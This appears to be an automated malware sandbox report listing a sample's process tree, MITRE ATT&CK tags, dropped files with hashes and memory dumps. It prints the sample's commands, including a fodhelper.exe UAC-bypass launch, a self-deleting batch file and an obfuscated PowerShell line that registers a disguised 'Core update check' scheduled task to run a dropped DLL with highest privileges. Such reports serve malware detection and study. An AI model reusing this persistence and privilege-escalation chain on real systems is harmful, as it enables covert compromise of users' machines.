"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4104 /prefetch:2
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1984 /prefetch:8
6⤵
PID:2160

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
5⤵
PID:4544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lxpwR.bat" "
6⤵
PID:2820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\lxpwR.bat" *
7⤵
PID:5040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe function lXaTHPIMgDeIVvlfqHA ($nARswVhMRcfL){ $SfuFUBdulKOIhfkjXUL = 'Core update check'; $yIeGITfeyZCr = @{ Action = (New-ScheduledTaskAction -Execute "Rundll32.exe" -Argument ' C:\Users\Admin\AppData\Local\Temp\0397ase.dll,DllRegisterServer'); Trigger = (New-ScheduledTaskTrigger -Once -At(Get-Date).AddSeconds(5)); TaskName = $SfuFUBdulKOIhfkjXUL; Description = 'Core updating process.'; TaskPath = 'UpdateCheck'; RunLevel = 'Highest'}; Register-ScheduledTask @yIeGITfeyZCr -Force}; lXaTHPIMgDeIVvlfqHA C:\Users\Admin\AppData\Local\Temp\0397ase.dll
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3200

C:\Windows\system32\cmd.exe
cmd /c del "C:\Users\Admin\AppData\Local\Temp\lxpwR.bat"
8⤵
PID:3576

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:3204

C:\Windows\system32\Rundll32.exe
Rundll32.exe C:\Users\Admin\AppData\Local\Temp\0397ase.dll,DllRegisterServer
1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3252

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
45c815f0a0e10f75c450369e5b8673f9

SHA1
b3f8e50200afefd0e4c271c3de84ef4d93c5f6c9

SHA256
4bd75d9f94626d1a4b514515dfa9c1abfca3d5a1a36f4d1f0dfb8489db453a97

SHA512
0120c1f3c501c0630c931f873794f6c7ef1e87216b95aaf76479dfff1614020a7de38c62a24f92a82ae1b0a55b041308d24390b6f556c62d535bef938e4f6974

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7224298af316ab030a6ea7b29e69915d

SHA1
c73b3f8af0647472461d4746f9edf2153b754bd0

SHA256
c869d981719dc133b2e2dba5cfc9925ce9b327dbf079a18b8b6caa77716e1f87

SHA512
5ae6512f693439759dfc913af7db37395fba2216c1b87bf5b6788a39f01a7c22f6daac0c2ccb680c552d431ed5806a344358a2e1856045a2efad43f0059ad099

Download Submit
C:\Users\Admin\AppData\Local\Temp\0397ase.dll
Filesize
702KB

MD5
9b692f43d575acb739decfc809db7f2e

SHA1
bc42c60590cb908e765e2d97e8b3a92b4616cd30

SHA256
0581f0bf260a11a5662d58b99a82ec756c9365613833bce8f102ec1235a7d4f7

SHA512
f99f546940bd96c6e9cac6a8500f25280ed190b9830247a5c7249d30a40fd1b4e3c94ca0455e337e77682a7a2b14a259b0aa4cf9680e9ccf727f71ae69873473

Download Submit
C:\Users\Admin\AppData\Local\Temp\0397ase.dll
Filesize
702KB

MD5
9b692f43d575acb739decfc809db7f2e

SHA1
bc42c60590cb908e765e2d97e8b3a92b4616cd30

SHA256
0581f0bf260a11a5662d58b99a82ec756c9365613833bce8f102ec1235a7d4f7

SHA512
f99f546940bd96c6e9cac6a8500f25280ed190b9830247a5c7249d30a40fd1b4e3c94ca0455e337e77682a7a2b14a259b0aa4cf9680e9ccf727f71ae69873473

Download Submit
C:\Users\Admin\AppData\Local\Temp\DeepL_Logo_darkBlue_v2.svg
Filesize
1KB

MD5
777a20dc2f64eeb9195fb25113a3e7ac

SHA1
d6f8ffdd1f8caad4a978e621ae344a9fa5ba0313

SHA256
71df5c84f31125f2f585a82489a570efb6fb371c6ca2b8c1deabca4463e601ba

SHA512
216020d3f7325e717113ac85729cbbf99286c26124b2f7e422271867870a96eeb35548b91a1aee89cd8ff1102c526fe8fb1842ef408b18801673d17d418b8595

Download Submit
C:\Users\Admin\AppData\Local\Temp\lxpwR.bat
Filesize
714B

MD5
c89f63062141bea640be6864ba85f57f

SHA1
dce355e580893996f4df0753785f975fb7801d7e

SHA256
28770f2c402d52622b2a1ce5ee07aeb75071196a3699054af780766b6a3b1125

SHA512
773ec4a25afc690f2be3816544fe7718631c28be5d53c3b255b3466db270338f01829d1bd841536ef59d5f973e0eaf3e8a20fa8f22da9c137a295761d5da862b

Download Submit
\??\pipe\LOCAL\crashpad_1544_JVLPPMHJQQBPALHY
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1020-164-0x0000000000000000-mapping.dmp

Download
memory/1264-138-0x00007FFA0DD10000-0x00007FFA0E7D1000-memory.dmp

Filesize
10.8MB

Download
memory/1264-135-0x0000000000000000-mapping.dmp

Download
memory/1312-153-0x0000000000000000-mapping.dmp

Download
memory/1324-182-0x0000000000000000-mapping.dmp

Download
memory/1452-140-0x0000000000000000-mapping.dmp

Download
memory/1544-139-0x0000000000000000-mapping.dmp

Download
memory/1888-169-0x0000000000000000-mapping.dmp

Download
memory/2160-185-0x0000000000000000-mapping.dmp

Download
memory/2820-155-0x0000000000000000-mapping.dmp

Download
memory/2996-170-0x0000000000000000-mapping.dmp

Download
memory/3200-160-0x00007FFA0DD10000-0x00007FFA0E7D1000-memory.dmp

Filesize
10.8MB

Download
memory/3200-158-0x0000000000000000-mapping.dmp

Download
memory/3216-166-0x0000000000000000-mapping.dmp

Download
memory/3252-173-0x0000000180000000-0x0000000180009000-memory.dmp

Filesize
36KB

Download
memory/3576-167-0x0000000000000000-mapping.dmp

Download
memory/3684-143-0x0000000000000000-mapping.dmp

Download
memory/3792-142-0x0000000000000000-mapping.dmp

Download
memory/3968-162-0x0000000000000000-mapping.dmp

Download
memory/4300-131-0x000002ABC07A0000-0x000002ABC07C2000-memory.dmp

Filesize
136KB

Download
memory/4300-133-0x00007FFA0E470000-0x00007FFA0EF31000-memory.dmp

Filesize
10.8MB

Download
memory/4300-130-0x0000000000000000-mapping.dmp

Download
memory/4432-145-0x0000000000000000-mapping.dmp

Download
memory/4440-180-0x0000000000000000-mapping.dmp

Download
memory/4516-168-0x0000000000000000-mapping.dmp

Download
memory/4544-154-0x0000000000000000-mapping.dmp

Download
memory/4772-148-0x0000000000000000-mapping.dmp

Download
memory/4776-150-0x0000000000000000-mapping.dmp

Download
memory/5012-132-0x0000000000000000-mapping.dmp

Download
memory/5040-157-0x0000000000000000-mapping.dmp

Download
memory/5108-183-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads